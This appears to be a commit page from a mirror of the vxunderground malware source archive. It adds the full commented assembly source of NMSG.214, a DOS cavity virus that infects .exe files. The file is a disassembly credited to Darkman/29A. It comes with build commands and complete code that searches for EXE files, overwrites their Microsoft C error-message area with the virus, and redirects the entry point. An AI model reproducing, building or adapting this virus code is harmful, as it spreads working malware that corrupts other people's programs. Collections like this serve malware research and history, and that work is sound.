mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-16 15:59:24 +00:00
re-organize
push
This commit is contained in:
vxunderground
@@ -0,0 +1,174 @@
|
||||
comment *
|
||||
NMSG.214 ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
|
||||
Disassembly by ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
|
||||
Darkman/29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
|
||||
ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
|
||||
ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
|
||||
|
||||
NMSG.214 is a runtime/direct action cavity EXE virus. Infects one file in
|
||||
current directory, by searching for an area of Microsoft C error messages
|
||||
and overwriting that area with the virus.
|
||||
|
||||
I would like to thank VirusBuster/29A for providing me with the binary of
|
||||
this virus.
|
||||
|
||||
To compile NMSG.214 with Turbo Assembler v 5.0 type:
|
||||
TASM /M NMSG_214.ASM
|
||||
TLINK /x NMSG_214.OBJ
|
||||
*
|
||||
|
||||
.model tiny
|
||||
.code
|
||||
.186
|
||||
|
||||
code_begin:
|
||||
call delta_offset
|
||||
virus_begin:
|
||||
initial_csip:
|
||||
initial_ip dw 00h ; Initial IP
|
||||
initial_cs dw 0fff0h ; Initial CS relative to start of ...
|
||||
file_specifi db '*.exe',00h ; File specification
|
||||
string_begin:
|
||||
scan_string db '<<NMSG>>'
|
||||
string_end:
|
||||
delta_offset:
|
||||
pop bp ; Load BP from stack
|
||||
|
||||
push ds es ; Save segments at stack
|
||||
|
||||
mov ax,ss ; AX = stack segment
|
||||
add ah,10h ; AX = segment of buffer
|
||||
|
||||
mov bx,ds:[02h] ; BX = segment of first byte beyon...
|
||||
sub bx,ax ; Subtract stack segment from segm...
|
||||
cmp bh,10h ; Insufficient memory?
|
||||
jb virus_exit ; Below? Jump to virus_exit
|
||||
|
||||
mov es,ax ; ES = segment of buffer
|
||||
xor dx,dx ; DX = offset of Disk Transfer Ar...
|
||||
|
||||
|
||||
push ss ; Save SS at stack
|
||||
pop ds ; Load DS from stack (SS)
|
||||
|
||||
mov ah,1ah ; Set Disk Transfer Area address
|
||||
int 21h
|
||||
|
||||
mov ah,4eh ; Find first matching file (DTA)
|
||||
xor cx,cx ; CX = file attribute mask
|
||||
lea dx,[bp+(file_specifi-virus_begin)]
|
||||
|
||||
push cs ; Save CS at stack
|
||||
pop ds ; Load DS from stack (CS)
|
||||
|
||||
int 21h
|
||||
jc virus_exit ; Error? Jump to virus_exit
|
||||
examine_file:
|
||||
mov ax,ss:[1ch] ; AX = high-order word of file size
|
||||
or ax,ax ; Filesize too large?
|
||||
jnz find_next ; Not zero? Jump to find_next
|
||||
|
||||
clc ; Clear carry flag
|
||||
call read_file
|
||||
jc find_next ; Error? Jump to find_next
|
||||
shl word ptr ds:[0ch],01h
|
||||
jp find_next ; Too much addition... Jump to find_next
|
||||
|
||||
cld ; Clear direction flag
|
||||
lea si,[bp+(scan_string-virus_begin)]
|
||||
xor di,di ; Zero DI
|
||||
|
||||
push cs ; Save CS at stack
|
||||
pop ds ; Load DS from stack (CS)
|
||||
compare_loop:
|
||||
pusha ; Save all registers at stack
|
||||
mov cx,(string_end-string_begin)
|
||||
rep cmpsb ; Microsoft C error messages?
|
||||
popa ; Load all registers from stack
|
||||
je infect_file ; Equal? Jump to infect_file
|
||||
|
||||
inc di ; Increase index register
|
||||
|
||||
loop compare_loop
|
||||
find_next:
|
||||
mov ah,4fh ; Find next matching file (DTA)
|
||||
int 21h
|
||||
jnc examine_file ; No error? Jump to examine_file
|
||||
|
||||
int 17h
|
||||
virus_exit:
|
||||
pop es ds ; Load segments from stack
|
||||
|
||||
mov dx, 80h ; DX = offset of default Disk tran...
|
||||
mov ah,1ah ; Set Disk Transfer Area address
|
||||
int 21h
|
||||
|
||||
mov ax,cs ; AX = code segment
|
||||
add cs:[bp+(initial_cs-virus_begin)],ax
|
||||
jmp dword ptr cs:[bp+(initial_csip-virus_begin)]
|
||||
infect_file:
|
||||
mov bx,di ; BX = offset of virus within file
|
||||
lea si,[bp+(code_begin-virus_begin)]
|
||||
mov cx,(code_end-code_begin)
|
||||
rep movsb ; Move virus to Microsoft C error ...
|
||||
|
||||
push es ; Save ES at stack
|
||||
pop ds ; Load DS from stack (ES)
|
||||
|
||||
mov si,14h ; SI = offset of initial IP
|
||||
lea di,[bx+(initial_csip-code_begin)]
|
||||
push si ; Save SI at stack
|
||||
movsw ; Store initial IP
|
||||
movsw ; Store initial CS relative to sta...
|
||||
pop si ; Load SI from stack
|
||||
|
||||
mov [si+02h],cx ; Store initial CS relative to sta...
|
||||
mov ax,ds:[08h] ; AX = header size in paragraphs
|
||||
mov cl,04h ; Multiply header size in paragrap...
|
||||
shl ax,cl ; AX = header size
|
||||
sub bx,ax ; Subtract header size from initia...
|
||||
mov [si],bx ; Store initial IP
|
||||
|
||||
stc ; Set carry flag
|
||||
call write_file
|
||||
|
||||
jmp virus_exit
|
||||
|
||||
read_file proc near ; Read from file
|
||||
write_file proc near ; Write to file
|
||||
pushf ; Save flags at stack
|
||||
mov ax,3d00h ; Open file (read); Create or trun...
|
||||
sbb ah,al ; " " " " " "
|
||||
xor cx,cx ; CX = file attributes
|
||||
mov dx,1eh ; DX = offset of filename
|
||||
|
||||
push ss ; Save SS at stack
|
||||
pop ds ; Load DS from stack (SS)
|
||||
|
||||
int 21h
|
||||
mov bx,ax ; BX = file handle
|
||||
pop ax ; Load AX from stack (flags)
|
||||
jc error ; Error? Jump to error
|
||||
|
||||
mov cx,ds:[1ah] ; CX = low-order word of file size
|
||||
|
||||
push es ; Save ES at stack
|
||||
pop ds ; Load DS from stack (ES)
|
||||
|
||||
xor dx,dx ; Zero DX
|
||||
mov ah,al ; AH = low-order byte of flags
|
||||
sahf ; Store register AH into flags
|
||||
|
||||
mov ah,3fh ; Read from file; Write to file
|
||||
adc ah,dl ; " " " " " "
|
||||
int 21h
|
||||
|
||||
mov ah,3eh ; Close file
|
||||
int 21h
|
||||
error:
|
||||
ret ; Return
|
||||
endp
|
||||
endp
|
||||
code_end:
|
||||
|
||||
end code_begin
|
||||
Reference in New Issue
Block a user